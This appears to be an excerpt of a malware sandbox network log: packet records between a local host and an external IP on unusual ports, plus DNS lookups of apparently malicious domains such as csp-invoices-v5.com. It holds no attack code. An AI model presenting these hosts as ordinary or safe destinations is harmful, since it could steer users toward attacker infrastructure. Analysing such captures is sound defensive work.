Dec 17, 2024 08:40:40.023277998 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.023528099 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.035660982 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.035718918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.035793066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.052274942 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.052350998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.073746920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.073860884 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.079045057 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.079117060 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.079176903 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.095518112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.095961094 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.096020937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.096060991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.096155882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.096195936 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.107038021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.108021021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.108115911 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.108268976 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.112251043 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.115869999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.124041080 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.124078035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.124177933 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.137478113 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.139189959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.139298916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.139486074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.155946016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.158023119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.166840076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.167150021 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.167187929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.167227983 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.176275015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.176338911 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.176433086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.197305918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.197382927 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.198189974 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.198370934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.198415041 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.211882114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.211977959 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.220105886 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.220443964 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.220504045 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.227940083 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.231873989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.243946075 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.244455099 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.244576931 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.263490915 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.266077042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.267896891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.287578106 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.287666082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.296983957 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.297013044 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.297153950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.315402031 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.318008900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.318089008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.318188906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.329663038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.331896067 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.340271950 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.343869925 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.345206976 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.345312119 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.345505953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.364340067 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.364789963 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.379198074 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.379337072 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.380594015 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.383330107 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.407577991 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.407640934 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.407972097 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.415870905 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.415961981 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.416620016 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.416665077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.418381929 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.419846058 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.420058966 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.420109987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.435355902 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.435926914 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.451384068 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.451900005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.463761091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.464025021 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.470246077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.471857071 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.496629953 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.499164104 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.499845028 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.510350943 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.510476112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.532551050 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.532598972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.532701969 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.536425114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.536504030 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.537189960 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.537240982 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.539834023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.540879965 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.561625004 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.561661959 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.561781883 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.575839043 CET	80	50064	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.580185890 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.583424091 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.583457947 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.591629028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.591857910 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.608294010 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.616830111 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.619879007 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.626517057 CET	9000	50065	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.626532078 CET	9000	50065	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.626668930 CET	50065	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.626718044 CET	50065	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.627405882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.627860069 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.631388903 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.636805058 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.638592005 CET	50062	228	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.643764019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.643903971 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.656214952 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.657074928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.657198906 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.657229900 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.676584005 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.681595087 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.683954000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.687372923 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.687388897 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.687532902 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.703327894 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.705674887 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.705760002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.706041098 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.728743076 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.731926918 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.732276917 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.732336998 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.735454082 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.735538960 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.735819101 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.736468077 CET	50066	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.736507893 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.747384071 CET	9000	50065	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.747834921 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.747868061 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.747975111 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.756712914 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.758496046 CET	228	50062	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.764383078 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.764394999 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.764522076 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.775930882 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.776053905 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.783833027 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.787892103 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.796453953 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.798403025 CET	50064	80	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.798455000 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.803493023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.803543091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.803636074 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.807327032 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.807893991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.831032991 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.844835997 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.847945929 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.852583885 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.855155945 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.855292082 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.855376005 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.856265068 CET	9000	50066	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.856667995 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.856751919 CET	50066	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.856844902 CET	50066	9000	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.873943090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.875953913 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.889620066 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.889766932 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.889866114 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.904372931 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.907908916 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.918232918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.919954062 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.920449972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.927680969 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.927870989 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.945744038 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.947065115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.947082996 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.947179079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.950917006 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.951042891 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.975402117 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.975474119 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:40.976459980 CET	9000	50066	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.994180918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.994193077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:40.994311094 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.010339975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.010358095 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.010380983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.010437012 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.010462999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.039691925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.039773941 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.044301987 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.044361115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.059150934 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.059170008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.059256077 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.065726042 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.065972090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.067698002 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.067711115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.067814112 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.095428944 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.095499992 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.101452112 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.101526022 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.101560116 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.125428915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.125447035 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.125521898 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.139082909 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.139146090 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.143382072 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.143556118 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.144810915 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.144829988 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.144876957 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.164467096 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.164710999 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.179575920 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.179593086 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.179647923 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.187556028 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.187865019 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.187961102 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.201893091 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.202034950 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.215476990 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.215534925 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.215578079 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.231899023 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.235910892 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.239839077 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.243959904 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.251409054 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.251420975 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.251532078 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.263828993 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.267290115 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.272886038 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.272903919 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.273092985 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.293512106 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.294255972 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.294274092 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.294291973 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.294512987 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.307835102 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.311940908 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.335174084 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.335975885 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.336487055 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.336600065 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.363745928 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.363812923 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.366815090 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.366928101 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.366974115 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.387242079 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.387347937 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.393513918 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.393636942 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.393660069 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.394032001 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.395967007 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.396017075 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.413856983 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.415041924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.431828022 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.432161093 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.455384970 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.455406904 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.455488920 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.456662893 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.456712008 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.456790924 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.486681938 CET	15647	50034	92.255.57.75	192.168.2.11
Dec 17, 2024 08:40:41.486794949 CET	50034	15647	192.168.2.11	92.255.57.75
Dec 17, 2024 08:40:41.491624117 CET	15647	50034	92.255.57.75	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 08:38:19.413816929 CET	192.168.2.11	1.1.1.1	0x59a2	Standard query (0)	static.klipxuhaq.shop	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:24.085011005 CET	192.168.2.11	1.1.1.1	0x6540	Standard query (0)	csp-invoices-v5.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:25.208636999 CET	192.168.2.11	1.1.1.1	0x1db6	Standard query (0)	cndef1.green-pathways.shop	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:38.523869991 CET	192.168.2.11	1.1.1.1	0xe219	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:38:51.460329056 CET	192.168.2.11	1.1.1.1	0x3fd8	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:39:04.067358971 CET	192.168.2.11	1.1.1.1	0x4a3d	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:39:28.205368996 CET	192.168.2.11	1.1.1.1	0x36aa	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:39:52.299853086 CET	192.168.2.11	1.1.1.1	0x99aa	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:40:16.377424955 CET	192.168.2.11	1.1.1.1	0x73a2	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:40:40.736978054 CET	192.168.2.11	1.1.1.1	0x1e34	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 08:38:19.551887035 CET	1.1.1.1	192.168.2.11	0x59a2	No error (0)	static.klipxuhaq.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
